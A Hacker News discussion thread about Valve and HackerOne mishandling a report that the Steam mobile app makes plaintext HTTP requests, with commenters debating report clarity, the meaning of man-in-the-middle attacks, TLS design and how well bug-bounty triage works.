Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Valve and HackerOne: how not to handle vulnerability reports (jakegealer.me)
243 points by andrenotgiant on April 14, 2020 | hide | past | favorite | 157 comments


I think Valve and HackerOne handled this poorly, but I think the author is partially at fault for repeatedly failing to communicate the issue clearly.

I worked as a penetration tester for a while, and I had trouble understanding what the author was saying. The headline should have been that the steam mobile app makes requests to the plaintext HTTP URL (http://store.steampowered.com) instead of the TLS-authenticated URL (https://store.steampowered.com). Without TLS, an attacker can impersonate the Steam store server and steal credit cards or trick users into installing malicious apps.

The author reported this as:

>The vulnerability is that an attacker can perform a man in the middle attack by spoofing an HTTP request pretending to be from store.steampowered.com. While the client does check for an eventual HTTPS redirect, it can redirect to an HTTPS URL.

There's so much ambiguity and missing information in that writeup:

* Who does the attacker send an HTTP request to? I think the author meant to say an HTTP response.

* In "it can redirect," does the word "it" refer to the "the client" or "redirect?"

* I think "it can redirect to an HTTPS URL" was supposed to be "any HTTPS URL."

* Why is the client vulnerable? What should they be doing instead?

Also, the author's exploit scenario is to just make the Steam app load his portfolio page, which might have further muddled things. It sounds inconsequential that an attacker can trick Steam users into visiting a developer's portfolio page. It might have been a clearer report if the proof-of-concept redirected to a website that looked like the Steam store but had a warning saying, "I'm an evil copy of the Steam store that will steal your credit card number."


I'm not a security expert. I am a software engineer; as such make it my responsibility to understand something of network security, but I have no formal training in such and I don't work in a specifically security-focused role. Nor do I work for an explicitly security-focused company.

I understood the issue clearly on first read.

You're absolutely right that it could have been explained more clearly, and that there is some ambiguity in the wording (not everyone's a perfect communicator). But if I (a very normal, non-security-focused software engineer) can grok this, it's the absolute least I would expect from someone working for HackerOne! Their entire job is to be able to understand this sort of thing in depth.


Exactly! I was sitting there scratching my head on this one. I get that Joe Shmoe wouldn't understand the risks of a MITM and the potential areas it could be exploited, even John Q Programmer I wouldn't guarantee to understand the risks.

But a person working at Hacker One who's job is assessing vulnerabilities doesn't understand the threat of a MITM? What?! Does everyone at Hacker One think the whole move to HTTPS was just pointless security theater or something? How is that possible? How does this chain of events even happen? It looks like the author spoke to multiple people at Hacker One who were genuinely not understanding the threat, after it was explained to them.

We must be missing some side of this here. That's too absurd to be real.


I skimmed it. He saw a bunch of http gets and the setup a dns server and ohh I see where he’s going with this. Yep a picture of a weird page in the steam app ok I get it.


> I think the author is partially at fault for repeatedly failing to communicate the issue clearly.

I disagree. The first sentence of the report includes "HTTP", "man in the middle attack" and "store.steampowered.com"

If that isn't clear to someone, they are not sufficiently trained to triage vulnerability reports. You simply cannot do that job right if you need the attacker to hand-walk you through the difference between HTTP and HTTPS and why you would use the latter for an online store.


I immediately understood what he was saying right from the start. He even mentions there is an eventual https redirect, but the app should start with the https request!

I've got about 20 years of experience as a software dev. I probably would have written it differently, but at the same time .. I fully understood what he was saying immediately. There's nothing difficult to understand there.

We're never even talking about HSTS or certificate pinning. We're just talking about the very first call from the mobile app to their website/api.


Respectfully disagree with this one. We don't even have a bounty program, and we get at least 10 non-issues for every actual potentially exploitable report.

I can definitely see someone reviewing this and accidentally putting it in the "not a problem" bucket. From our perspective, the best vulnerability reports look like:

"This potential exploit can crash your node"

"This potential exploit can steal user funds"

Etc.

It really helps us filter through the nonsense reports we get.


While I can see what you're saying, you also have to properly compute, on your end, a cost for a False Positive and a cost for a False Negative.

In my opinion, in the case of security, I think a False Negative should weigh a lot, and thus measures to prevent it should be in place (i.e. not having an intern mindlessly looking through issues and sorting them into buckets).

Of course, the cost of each will depend on your app/company, its industry, its size, and so on.


Do note that mtlynch is not saying that it's all the authors fault and Valve/HackerOne couldn't handle this better.

What you've written can be true as at the same time, what mtlynch has written is true too. Everyone could do better here.

But most likely, giving feedback to Valve/HackerOne via a Hacker News thread is likely to not be read. The feedback to the author is more likely to be read by the author themselves and other aspiring penetration testers.

So in the end, everyone could have done better.


I feel like that issue translation step is part of what HackerOne is actually there to do though - they serve as a collection and initial triaging point... if they are bad at doing a first pass of issue triaging and clarification then what are they even doing?

Additionally the person at hackerone did ask for some clarification around the issue, that's great as it is helping with identification but probably also needs to encompass expressing the problem to make it clearer to read.


Indeed, I agree with you. Poorly handled. But that doesn't mean you as a penetration tester can do better _also_, to avoid similar future scenarios where they handle things poorly.


Since I see people on HN get this wrong more than 90% of the time I want to demystify the term Man in the Middle.

https://en.wikipedia.org/wiki/Man-in-the-middle_attack

The Wikipedia article's description is correct. MITM is a cryptographic attack where an impostor is performing certificate interception and so relays encrypted traffic. MITM is not merely listening to just any traffic.

If the violation occurred over port 80 its a safe bet there is no man in the middle attack. If I were doing security triage and I saw "man in the middle" and anything about HTTP or port 80 I would not consider this a priority ticket.

This incident is just a software defect rather than a security violation from the unexpected use of a reverse proxy: https://en.wikipedia.org/wiki/Reverse_proxy

An unsupported reverse proxy was only possible because the site was transmitting over HTTP instead of HTTPS.

> If that isn't clear to someone

It isn't clear merely because you used the scary term: MITM. A trained security professional performing triage would devalue the security ticket pending further investigation.


I do not understand the distinction you are trying to make. MITM has nothing in particular to do with certificates, and describes any attack in which Alice <--> Bob, cryptographically or otherwise, and Mallory intercepts and controls communications via Alice <--> Mallory <--> Bob. Essentially every malicious proxy attack is a MITM.

The bug here seems to be that the Steam local app relies on an HTTP 80/tcp connection for first contact with Steam's backend. That's a legit finding. The "requires physical access" thing seems pretty obviously to be a misapplication of the H1 scope.


> The bug here seems to be that the Steam local app relies on an HTTP 80/tcp connection for first contact with Steam's backend. That's a legit finding.

I agree that it is a valid finding, but its reported in wildly different terms than what you just described. That is just cause to triage a reported incident as low priority.


"The vulnerability is that an attacker can perform a MITM attack by spoofing an HTTP request pretending to be from store.steampowered.com".

The blog post writeup isn't the best in the world, but the actual H1 submission seems fine.


If the traffic is redirected using a reverse proxy at what point does that traffic reach the intended destination? It doesn't. It reaches the impostor destination.

In order for a MITM attack to occur the attacker must establish trust with both end points, which isn't happening in this case.


Oh, I see the point you're making. Yeah, that's true. Sorry!


You are contradicting thr WP description, there is no cryptography required to meet the definition:

"In cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other"

The WP definition is the commonly accepted one too, not a case of WP getting it wrong.


> "In cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other"

If the attack is redirecting traffic away from the server at what point does the server believe it is communicating with the user? The server cannot validate the user traffic since it does not have it.

> The WP definition is the commonly accepted one too, not a case of WP getting it wrong.

That is the opposite of what I said.


My comment was just on the misconception of what MITM is.

That being said, I do think the article's documented report clearly demonstrated how the app was vulnerable to MITM even if the PoC didn't implement the attack all the way. And as a word of advice to the vendor, you probably don't want to train all your well meaning vulnerability researcher pals to productise their vulnerability PoCs into production quality exploits, lest they get the temptation to sell them on other types of markets...


But here, there's no communication with store.steampowered.com. I mean, there could be— oh, yeah, getting it now. That's much worse than I thought it was; you could extract money from the account via gifts without even getting the user to re-enter their bank details.


> If the violation occurred over port 80 its a safe bet there is no man in the middle attack. If I were doing security triage and I saw "man in the middle" and anything about HTTP or port 80 I would not consider this a priority ticket.

Can you explain this more? Are you just arguing that it's unencrypted and therefore by definition not MITM? I'm skeptical that this is common usage of the term (the Wikipedia article you linked to seems to disagree with you). And this seems a little like saying that you wouldn't be concerned about a privilege-escalation attack since you're inadvertently running everything as root.


> Are you just arguing that it's unencrypted and therefore by definition not MITM?

That is exactly what I am saying for 2 reasons.

1. If the connection is HTTP instead of HTTPS there is no trust. MITM is trust violation attack, which cannot be present if there is no trust to attack.

2. All kinds of software and hardware redirect traffic under normal operating conditions. That isn't a MITM merely because the path of traffic, or even the end point, is different than expected. For instance a load balancer could route you from an expected location to different physical data center, which is a completely different end point both physically and logically but its not necessarily an attack if you are still where you want to be and both end points trust each other.

The reason why trust is available with HTTPS and not HTTP isn't even because the pipe is encrypted, but because HTTPS uses certificates and HTTP does not. MITM is all about a trust violation. Certificates are not required with HTTPS, but your browser yells at you when a certificate is absent or untrusted.


> MITM is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other. - Wikipedia on MITM

1. The steam client ("The App") thinks that it's communicating with Valve Inc. via store.steampowered.com ("The Store")

2. The App fails to validate that it is actually communicating with The Store by not using https

3. Thus, an attacker with control of an external network (e.g. a coffee shop wifi) can "secretly relay and possibly alter the communication between The App and The Store who believe they are communicating with each other"

I don't know how this could be any less than the definition of a MITM by wikipedia's own standard. That this kind of attack is also related to cryptography is immaterial to the fact that a reverse proxy is a MITM. It doesn't somehow make it not MITM because they weren't using any cryptography, it means that they failed to implement a protocol that sufficiently protects against MITM.


> 2. The App fails to validate that it is actually communicating with The Store by not using https

That is the software defect, and that alone. Everything else is completely working as designed even if the results not expected. That does not rise to the level of a MITM.

> 3. Thus, an attacker with control of an external network (e.g. a coffee shop wifi) can "secretly relay and possibly alter the communication between The App and The Store who believe they are communicating with each other"

In that scenario the store would never believe it is talking with one of its user's because the traffic was relayed to an alternate location. Therefore its an impersonation and not a MITM.


> That does not rise to the level of a MITM.

You're not gaining any ground by claiming the existence of "levels" of MITM. A MITM vulnerability is failing to validate who you're communicating with. The Steam App did this. Thus Steam is vulnerable to a MITM attack.

> In that scenario the store would never believe it is talking with one of its user's because the traffic was relayed to an alternate location. Therefore its an impersonation and not a MITM.

I don't understand what this means? The Store (store.steampowered.com) believes that the user is anyone who can produce the user's credentials. The App represents the user by holding the user's credentials. The App tries to connect to The Store and believes that the world is thus: The App -> The Store. But The App fails to validate this and can be tricked into the world where: The App -> Attacker -> The Store (this is the MITM). The Store never has any more information than 'Someone with The User's credentials is connecting': Someone (with User's credentials) -> The Store. The Store's picture of the world is identical in both cases, it cannot distinguish a true user from an attacker if both have the user's credentials. This doesn't have anything to do with The Store and everything to do with The App.


> The Steam App did this.

It did not, because it cannot validate what it does not have. The reverse proxy in question redirects traffic away from the server to an unrelated location. As such there is nothing for the server to validate since the user traffic is somewhere else.

> Thus Steam is vulnerable to a MITM attack.

The traffic did not go through the attacker to the intended end point. It just went to the attacker.

> I don't understand what this means?

Impersonation is pretending to be somebody else. MITM is more than impersonation in that it must fool both end points, not just the user, of the connection.

> The Store (store.steampowered.com) believes that the user is anyone who can produce the user's credentials.

You are insinuating a replay attack, but there is no evidence of a replay attack. In a replay attack one end of the communication sends a message and an intercepting attacker replays the message for the distant end.

https://en.wikipedia.org/wiki/Replay_attack

Literally all that happened is that the attacker intercepted traffic and redirected it to a different location that is not the intended server. That is IP address spoofing, which is bad but far less bad because its easy to find if you looking for it. For this to be a MITM the attacker would have to intercept the traffic and route it to the intended server. MITM attacks are severe, because they are very challenging to detect since both end points believe the attacker is their intended end point and both end points are exchanging data without indication that trust is violated.

* https://en.wikipedia.org/wiki/IP_address_spoofing

* https://www.techopedia.com/definition/4020/masquerade-attack


> MITM is more than impersonation in that it must fool both end points, not just the user, of the connection.

You are correct, this particular implementation of the attack did not demonstrate MITM directly. But it did successfully demonstrate that a MITM attack was possible, because MITM directly follows from the client not validating the authenticity of the server. The fact that this implementation displayed their own page instead of proxying store.steampowered.com and logging the requests is utterly immaterial to vulnerability's viability as a tool for a MITM attacker.

If you're saying that this is not a MITM vulnerability because the vulnerability demo loaded their own page instead of Valve's... well that's a stupid argument, and it doesn't refute anything about the client application being vulnerable to MITM.

> You are insinuating a replay attack

I am not. The statement "The website believes that the user is anyone who can produce the user's credentials." is a universal truism that applies to every service ever created. This has nothing to do with replay.

> Literally all that happened is that the attacker intercepted traffic and redirected it to a different location that is not the intended server.

So literally all that server would have to do is respond with the actual html content from the store, and suddenly you would change your mind about whether this effectively demonstrates a MITM vulnerability? Your arguments are not making sense.


The wikipedia article you cite as evidence lists several examples where no cryptography is involved as MITM attacks. As do many other sources.

e.g. OWASP: https://owasp.org/www-community/attacks/Man-in-the-middle_at...


> The wikipedia article you cite as evidence lists several examples where no cryptography is involved as MITM attacks.

It only lists one example about key exchange. That is different than certificate exchange, but not for the point of this conversation.


Plaintext HTTP in itself isn't a vulnerability.

Suppose that Steam ran some kind of load balancing server at http://loadbalancer.steam.com (no TLS). Its only job is to respond to HTTP GET requests with the URL of the least-busy steam server like "https://a.store.steampowered.com" or "https://b.store.steampowered.com".

If the mobile client makes the request to the load balancer over plaintext HTTP and then verifies that the response has the steampowered.com domain and is https:// then that's not a vulnerability, despite the fact that an attacker can MitM the plaintext HTTP part.

I would recommend that Steam just do everything over HTTPS for the sake of defense in depth, but I definitely wouldn't award a bounty to someone for proving they could MitM my load balancer and cause no damage. The worst the attacker can do in that scenario is cause the app to see network failures (specifically, TLS handshake failures), but if the attacker is middling traffic, that's possible regardless.


No. No. No. No! Everything about this is wrong.

The load balancer ABSOLUTELY should be HTTPS only and all request from the app, from the very first request, should be over HTTPS. If you want more security, add Strict Transport security as well as certification pinning in the app.

But at a very basic level, there is absolutely no excuse for this app to making HTTP plain-text requests to steam at all.

In your example, I could setup a free Wi-Fi hotspot with a different DNS entry for http://loadbalancer.steam.com, have it go to my local ngixn server with a page that looks exactly like Steam's login, capture their user credentials, and then redirect them to actual Steam.

You can't just have a plain text load balancer redirect to https because someone else can intercept you BEFORE that redirect takes place.


>In your example, I could setup a free Wi-Fi hotspot with a different DNS entry for http://loadbalancer.steam.com, have it go to my local ngixn server with a page that looks exactly like Steam's login, capture their user credentials, and then redirect them to actual Steam.

Sorry, I don't think I communicated my hypothetical app clearly. Imagine the sequence is like this:

1. App makes a background HTTP request to http://loadbalancer.steam.com

2. Load balancer responds with a URL string like "https://a.steampowered.com"

3. App verifies that the domain ends with "steampowered.com" and starts with "https://"

4. If verification passes, app loads the response URL in the in-app browser

In that case, replacing http://loadbalancer.steam.com with a spoofed page doesn't do anything because the app's internal logic sees the response, not a human user. If you replaced it with anything but a https://*.steampowered.com, the app would refuse to load the URL, so I don't see the vulnerability.


1. Nobody competent would do this in a modern design.

2. Any security engineering team would flag this design.

3. Allowing https:// (anything) .steampowered.com / (anything) allows for arbitrary redirection into any property under that domain, some of which could be user (or customer) controlled. Does that matter on this domain? Who cares? Why have a design where you even have to ask?

The first contact with the load balancer should be HTTPS.


Hey Thomas, you actually kind of started me in web app security. You interviewed me for Matasano, and when I told you I didn't have experience with web apps, you overnighted me a copy of The Web Application Hacker's Handbook. You ultimately made me an offer, but after difficult deliberation, I ended up joining iSEC. Thanks again for sending me the book! It's been tremendously helpful.

I 100% agree that people shouldn't design systems this way, and if I were still a pentester, I'd write it up if I found it. But if the implementation correctly checked the domain and verified it was https:// (and maybe did some cert pinning), I couldn't justify anything higher than low severity.

We've kind of gone way into the weeds on my made up example, but it was initially in response to this:

>> > I think the author is partially at fault for repeatedly failing to communicate the issue clearly.

> I disagree. The first sentence of the report includes "HTTP", "man in the middle attack" and "store.steampowered.com" ... If that isn't clear to someone, they are not sufficiently trained to triage vulnerability reports.

I just disagree with the idea that any plaintext HTTP request in an app inherently is a vulnerability.


What a nice comment! And in a thread where I am definitely not at my best (it's been an allergy migraine kind of day). This made my evening; thank you. iSEC was a great team!

I'm more of an absolutist about HTTPS than you are, though. :)

I feel like every once in awhile I need to plow face-first into the brick wall of a friendly comment like this just as a signal to dial it back a bit. It's been a challenging couple weeks. I'll dial it back a bit! Thanks again.


This is an insanely flawed design and the responses to it are 100% factually correct in their assessment. loadbalancer.steampowered.com could still respond with a bad entry just as long as it fits the "https://*.steampowered.com" pattern.

If the application does some sort of SSL pinning you may have to MITM the handshake but that's not outside of the realm of possibility for a sophisticated attacker.

I know it's just an example of how something COULD work but I strongly disagree that the following is correct:

> The worst the attacker can do in that scenario is cause the app to see network failures

Also - it's worth noting that all of this DNS talk really makes the whole SSL discussion moot. This is exactly why things like DNSSEC exist. If I'm able to point your traffic wherever you're done.


No, not at all: the same LAN access that allows him to spoof DNS also allows him to spoof the authenticated-data bit in the DNS header to bypass DNSSEC. This is one of the great failings of DNSSEC.

DoH: different story.


I'm prefacing this with I'm VERY new to DNSSEC (apologies).

I guess I always assumed that DNSSEC would blow up when changing the destination of the point but have never really dealt with may DNSSEC rollouts outside of light maintenance.

Thanks for a great response, I'm going to formally learn on DNSSEC because this is a good flag that I need better understanding. Also DoH is a new topic to me too so definitely going to "dig" on that as well ;)


The right way to think of it is that DNSSEC is a server-to-server protocol. It makes it difficult for an upstream authority server to cache a spoofed record in your recursive server. It provides basically no on-the-wire security between your browser and your DNS server.


> If you replaced it with anything but a https://*.steampowered.com, the app would refuse to load the URL, so I don't see the vulnerability.

I’m going to take this as what the intention was when designing this solution.

> 3. App verifies that the domain ends with "steampowered.com" and starts with "https://"

I’m going to take this to be what would have actually been coded in this solution.

I’m now going to register notsteampowered.com, and bypass the bug in the code to deliver an exploit over https.

This solution is fragile. Why not just do the whole thing over TLS to begin with and avoid this vulnerability in the first place?


>I’m now going to register notsteampowered.com, and bypass the bug in the code to deliver an exploit over https.

Yeah, that's a good point. That's my mistake in spitballing, but the vulnerability wouldn't exist in an implementation that properly checked the domain.

Again, I 100% agree with you that it's fragile and not a good idea. I wouldn't design a system this way, and I would flag it if I reviewed an app that did this. I was just objecting to the idea that the discovery of any plaintext HTTP request is a bounty-worthy vulnerability.


> and then verifies that the response has the steampowered.com domain and is https://*

One would still need a justification for that design IMHO, but I don't think it is vulnerable to what you describe.


It's definitely a fine sanity check but I'd have to really think about whether it's a barrier.

Immediate things I worry about are around URL parsing.

Is evil.com<insert something here>steampowered.com going to pass as "steampowered.com" when it isn't? Will it handle punycode? All sorts of shit can go wrong when parsing a URL, and it's a real world problem when people implement the mitigation you're describing[0].

https://labs.detectify.com/2016/07/27/how-i-made-lastpass-gi...

This is just for starters. I think if I were being paid to think about it I'd probably be able to come up with some more. Can I mess with DNS? Can I inject some other malicious payload into the page, to take advantage of other vulns? etc etc etc

I would be extremely wary of this technique as a real boundary rather than just an assertion in code.


But why even deal with that complexity? It's another place where thinks can break or you forget something. You can verify the doamin there too, but that still doesn't mean you can just make the request for the redirect over http and think that's okay.


> verifies that the response has the steampowered.com domain and is https://

But you're trading an easy solution (only use https://) for several points of failures (validate potentially untrusted input all along the chain).

> verifies that the response has the steampowered.com domain

An attacker is going to look for any exploits on steampowered.com (open redirect, xss, etc.). So now your domain name check is insufficient, you also need to make sure that all of steampowered.com is secure (which, odds are, is managed by multiple teams).


There could also be a captive portal check going on.


No, the problem is that HackerOne isn't actually a "Bug Bounty as a Service" company. It's a "Cover Corporate Asses as a Service" company. They don't care if they don't understand your vulnerability. Their primary value add is that their customers can stick their heads into the sand and still create the impression that their software has no security flaws. What happens is that HackerOne forces security researchers into one specific workflow. They have an incentive to close as many bug reports as out of scope to avoid paying a bounty. There is no incentive to have qualified staff that actually have the technical background knowledge to determine if your report is actually a security problem or not. The fact that reporters have to create a hackerone account means that HackerOne can ban you from their platform and you automatically lose the ability to report bugs for other companies. What often happens is that they simply ignore your report and try to pretend that it never existed in the first place. When the reporter decides that public disclosure is the the path of last resort then HackerOne will respond immediately and blame the reporter for not following the HackerOne workflow and ban the account of that reporter.

The fact that Valve decided to pay money to this company implies that they don't care about security. You can't blame them for not fixing the vulnerabilities when HackerOne is interfering heavily in the process but you can blame Valve for knowingly choosing a company with a horrifyingly bad track record.


So in a nutshell, could we summarise the issue here as "Valve didn't use TLS and thus Valve's users are vulnerable to the exceptionally well-known consequences of not using TLS?"

If so, then... okay, but I don't know what the blog author was expecting when he reported this. Pointing out that HTTP has MiTM possibilities is kind of up there with pointing out that the sky is blue. If, in 2020, a site has made the choice not to upgrade to TLS then it's more likely a conscious decision than an oversight.


It was an oversight. They had HTTPS support. Going by the bug report, the client checked for a redirect to HTTPS, but didn’t check that it was to the correct domain.


OK, that's a little more understandable. I assume that the initial use of HTTP is an intentional tactic that Steam uses to discover whether it is behind a captive portal or similar. That being the case then yes, the Steam client shouldn't rely on the data returned from the HTTP request, and this seems like a bug.


The author stated that Valve ended up patching this and switching to fully-HTTPS, which makes me think that this was a bug and not intentional.


I'm not even a software engineer. Lowly MBA that writes R code. even I understood the gist. But the part that I understood well is that _this was a HackerOne managed program_, meaning that it's HackerOne's job to take a raw submission and turn it into a well designed report that can be triaged and fixed.


Thank you. This was a bit confusing. It helped that this was the first paragraph.

>This is my first blog, but I felt like this is something I needed to get off my chest after months. If people enjoy this blog post, I will probably do more in the future.

I'm sure this blog will probably learn a hard and fast lesson on writing thanks to your post. This can't be any easy topic to explain. You did a solid job, thank you again.


That first sentence is a trainwreck but the steps that follow do at least clearly outline the issue.


Companies receive so many "First, you have to be on the other side of this airtight hatch, then you..." reports that anything that looks even remotely like it will just get summarily closed. My personal favorite ones start with some form of "I copied the user's cookies from device A's file-system, and..."

Just some suggestion on how to report these kind of things, because there is an actual underlying issue here worth fixing. It's good that you didn't mention the reverse proxy. Next, don't say "spoofing an HTTP request" in your first sentence of the report, that's an immediate red flag. If you have access to spoof something on the network, it's already not an issue for 99% of people and an instant low priority. Instead, say "Steam insecurely relies on a redirect response to upgrade the hosted content from HTTP to HTTPS, instead of directly establishing the HTTPS connection". How this can be exploited is now much more general than just being a spoofing issue, with both the problem and solution clearly stated.


I've been on both sides of this, and sadly having HackerOne/BugCrowd as intermediaries often hurts more than it helps.

On one hand I've had to sort through the never ending stream of "if you bypass the safeguards first" issues and some guy in India copying and pasting open source vuln scanner reports. I get why people don't want to deal with this and outsource it.

On the other hand, I have a legitimate exploit against GitHub that is "working as intended" for months now. No amount of back and forth is going to convince them that leaking commit messages on enterprise accounts is serious apparently.


> No amount of back and forth is going to convince them that leaking commit messages on enterprise accounts is serious apparently.

If true, this deserves a write-up.

I'm sure a few enterprise accounts might agree, if anyone can see their dev-branch commit named "feature xyz" a month before they announce it.


Joke's on you:

    trying to fix bug
    maybe this?
    fuck
    idk
    idk
    idk
    maybe works
    k ready now


But also: "fix stupid fucking sql injection"


This sounds far worse than just leaking branch names. They said it’s leaking entire commit messages.

Those messages could contain very detailed descriptions of how a companies product works, or how a companies fraud controls operated.


Sorry, that's what I meant. I should rephrase: a commit message for a commit on the dev branch.

I was assuming a relatively lazy commit message as an example. You're correct in identifying that certain organizations might put a lot of information into a commit message.


Can you publish more details? Consider pastebin, github, personal blog, anywhere you can really.

Enterprises, as in publicly traded companies, should definitely not be leaking products and roadmaps because this affects their stock values. I bet you regulators won't like that and it will be fixed in a heartbeat.

edit: there is the CEO owner of github commenting on another front page article, might want to drop a word. https://news.ycombinator.com/item?id=22867627


Simply say that there is a typo in the steam configuration, it is connecting to the (insecure) URL http://...

This allows steam network traffic to be intercepted. It can be fixed by correcting the URL to https.

For example, somebody using steam from a coffee shop could have his credentials/cookies/accounts intercepted by the coffee shop operator or any other visitor.

I believe coffees and other gaming venues are a supported use case for steam and you do not wish to leave your users at risk.

IMO There is really no need to blow this out of proportion. It's just a typo. Developers make typos all the time. Bet they're more likely to double check something trivial like that if pointed to.


This is most likely not a typo. The redirect from http to http is most likely due to valve using a self signed ssl certificate and not directly exposing it to ATS, (iPhone). If they went directly to the https endpoint the OS would block the traffic to an invalid, (not CA authority signed), SSL certificate.


store.steampowered.com is a fully web accessible site with a CA signed certificate though. It's the main steam marketplace. I think the whole point is that they are leveraging this for their app, so using a self-signed CA doesn't make a lot of sense in that case (not that I'm sure it ever would for a company these days, SSL certs are cheap).


I don't think you understand. There is no such thing as a "self-signed" CA cert, (its one or the other). This not about money, it's about control. There are many benefits to using a self-signed SSL cert over purchasing a CA one. However, Apple and Android inherently distrust self-signed certs so you have to actually provide the cert directly to ATS/Android OS which involves bundling it within the app, (a messy process). The current industry "hack" is to use http within the app, and then re-direct to https, (which is exactly what the steam app does).


I understand, I mis-typed. I meant self-signed cert. That should have been pretty obvious from what I actually posted though.

https://store.steampowered.com is the official steam marketplace. It does not use a self-signed certificate.

> There are many benefits to using a self-signed SSL cert over purchasing a CA one.

I'm sure there are (not that any are immediately coming to mind), but this is the official web marketplace. It is NOT self-signed. It's signed by DigiCert, Inc, which is easy to check if you go there.

To clarify, store.steampowered.com is not some special app store subdomain. It's the official store, and where you are redirected in a browser if you go to steampowered.com. It is very unlikely they are using a self-signed certificate given it's an actual web address used by many tens of millions of people in their browsers primarily.


I'm not a valve developer so I can't tell you exactly what is happening, but you most certainly can serve different certificates to browser vs mobile. The apps are using WebViews which are not the same as Chrome and Mobile safari. It would make sense to us a CA cert for normal browser traffic as it is fairly sandboxed as far what you can and cannot do, the WebViews are a completely different environment.

Again I'm saying this based on real world experience with why someone would use http instead of https, so my point is just a guess. I might be giving Valve too much credit and trying to explain something that is just a mistake. I am basing my theory on the fact that the http endpoints immediately re-direct to https ones, so it seems to be intentional for one reason or another.


> I am basing my theory on the fact that the http endpoints immediately re-direct to https ones, so it seems to be intentional for one reason or another.

I don't know, that seems pretty bog-standard to me. You redirect to HTTPS when someone requests HTTP when you want your traffic to all be secure. At least, that's how it used to be, these days browsers be be more aggressive in trying to hand you to the HTTPS version of sites if port 80 doesn't respond, and in that case it might make more sense to turn down port 80 as long as all browsers do the right thing.


>There is no such thing as a "self-signed" CA cert, (its one or the other).

Not sure what you're trying to say here. What a cert is signed by and what a cert's usage is set to are orthogonal things. There are CA certs that are self-signed (look in your OS's trusted roots cert store) and there are CA certs that are signed by other CA certs (intermediate CA certs).


You can create your own CA and then add it to the trust/keystores of your applications. It's exactly the same thing that public CAs are doing. They strike a deal with browsers and operating systems and get added to those stores.

There is a lot of software that assumes that all connections signed with a given CA are trusted. You wouldn't want to use a public CA in that case because random people could access your services. Want to encrypt mongodb traffic? Create your own private CA. Want to encrypt zookeeper (or etcd for kubernetes) traffic? Create your own private CA. Each server and client gets its own certificate signed with that private CA and since only that private CA is marked as trusted it can be used to authenticate servers and clients. It's basically the same idea as if you had a cryptographically signed token such as JWT. (the private key of the CA is the shared secret)


Why does the redirected request accept a self-signed cert, but the initial request doesn't? That seems weird.


It depends on how the app is displaying the link. They could be setting all sorts of cookie info/metadata in the original http request. There are many answers as to why it is accepted. I'm obviously not the developer of the valve app so I can't tell you exactly.


What doe cookies and metadata have to do with certificate validation?


The http link could theoretically be serving the cert to the device. I'm not sure WHY they would do this, just guessing. However, the redirect makes it seem intentional for whatever reason.


> Companies receive so many [...] reports

If only Valve could hire a subcontractor whose task it was to triage and clarify theses reports...


The domain and what they are reading off of that filesystem matters though. Like for example, if there was a credential that is in the clear/poorly encrypted and used in other parts of your system.


I've reported one bug to HackerOne so far, which was a bug with Wordpress that allowed you to access the title of unpublished posts. Months went by with no reply, despite clear demonstrations of how it could be exploited.

Eventually I demonstrated the attack on Techcrunch's site to a Techcrunch reporter, showing him the titles of their upcoming news stories for the coming week, including embargoed news. They got in touch with HackerOne/Wordpress and it finally got resolved a month or two later.

I don't feel like HackerOne added anything positive to the mix, other than a layer of confusion/delay.


HackerOne started with such promise, but stories like this keep coming out. It makes you wonder how many people were even more patient than OP.

Unfortunately, despite all the HackerOne claims, it still seems to take public disclosure and embarrassment to make companies actually take things seriously. Seems sunlight is still the best disinfectant.


One of the big problems is the reports are bad. Like some person just shotgunning the output of an automated script to every company in there without really understanding. Or we get a lot of “I can squat an s3 bucket with the company name in it and make it public” - no way! So filtering through to the good ones takes too many hands, and often times they’re like this one where it’s like...yea technically true but an acceptable enough risk.

But occasionally the “oh f#%^” report comes in...


> HackerOne started with such promise, but stories like this keep coming out. It makes you wonder how many people were even more patient than OP.

To state the probably obvious, remember that primarily what you see are the negative interactions. You're unlikely to see many posts about the positive interactions. People don't tend to post so much when things go as expected, they do when they go wrong.


I think what you’re all missing is the asymmetry that most bug reports are bad. If you understand this then you understand that hackerone has respected its promises to companies hiring them: they perform the first set of triage. With the number of reports they are going through, the number of bad stories we’re hearing about them is pretty abysmal.

I feel like it’s the same with any type of bad news, it can easily blow out of proportion and wrongly indicate that things are going very very badly. I guess this is why the news are addicted to shocking and breaking news.


Yeah, as far as I understand the entire model of HackerOne is that it's a first-line force for the security team, just like an outsourced support. And the first line tends to be cheap instead of well-trained.


Eeeh, I think that's a false assumption - it may in fact be the case but specialized first line teams like this don't need to be cheap, they can instead work the margins and be economical by being focused. Not every company is going to have a full security team, so it does make some sense to try and pool those resources into one specialist company that serves the first line triage needs of a bunch of other companies.


Yeah, it should be the opposite. HackerOne should have a pool of experts that small companies wouldn't be able to afford and large companies don't have to hire security experts that sit idle most of the time.


And if the claims of HackerOne/Valve trying to get out of paying a bounty, that's just terrible, because a lot of these exploits can be sold to nefarious actors for much much more.

Not paying out the promised bounty, to me, basically spits in the face of independent (and ethical) security researchers.


Trying to put myself in the shoes of the Valve employee: I don't think they were trying to save their company money, but it still wasn't a smart move.

As a security team employee, I think it's easy to react defensively to every vulnerability report, to take them as critiques of the quality of your work. So it's natural for the first reaction to be jumping to "this is not a real report" or "this is a dupe".

But people in this position should think about the upside/downside of their actions.

ACCEPT - Upside: You show that your security team is responsive, you build trust with an active security community member. Downside: Your company pays out some fee (so tiny in big picture)

DENY - Upside: Your company doesn't pay out a fee. Downside: Usually a net negative for your company's reputation in security community, some chance you cause PR issues for your company.


Bounties are only a decent income if you're:

    * In that *very* small slice of hackerdom who can manage consistently a $10k bounty a month
    * Working a pretty favorable currency and CoL conversion
It takes a lot of discipline and well-developed process to handle vulnerabilities well. Many companies don't manage this. Instead, they are often earnestly bad at it.

It's possible Valve is trying to get out of paying the bounty. It's also possible and even likely that they're honestly just bad at handling reports as an organization.

That would make sense. At this point in time the primary reason to have a bug bounty program is so that you can can say you have one. Most will maybe get a handful of reports a quarter about low-hanging fruit.


HackerOne is a business operating in a field with a maximal cross-product of drama and customer service overhead. Of course you're going to see story after story about them. What else would you expect?

